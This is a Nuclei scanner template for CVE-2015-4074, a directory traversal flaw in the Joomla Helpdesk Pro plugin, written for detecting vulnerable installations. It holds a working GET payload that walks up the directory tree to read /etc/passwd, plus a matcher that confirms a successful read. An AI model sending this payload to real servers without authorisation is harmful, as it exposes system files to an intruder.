nuclei-templates/cves/2015/CVE-2015-4074.yaml

34 lines
1.2 KiB
YAML
Raw Normal View History

2022-08-16 02:43:40 +00:00
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
reference:
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
- https://www.exploit-db.com/exploits/37666/
2022-08-16 02:43:40 +00:00
- https://www.cvedetails.com/cve/CVE-2015-4074
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
2022-08-16 02:43:40 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-08-16 02:43:40 +00:00
cvss-score: 7.5
cve-id: CVE-2015-4074
cwe-id: CWE-22
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
2022-08-16 02:43:40 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200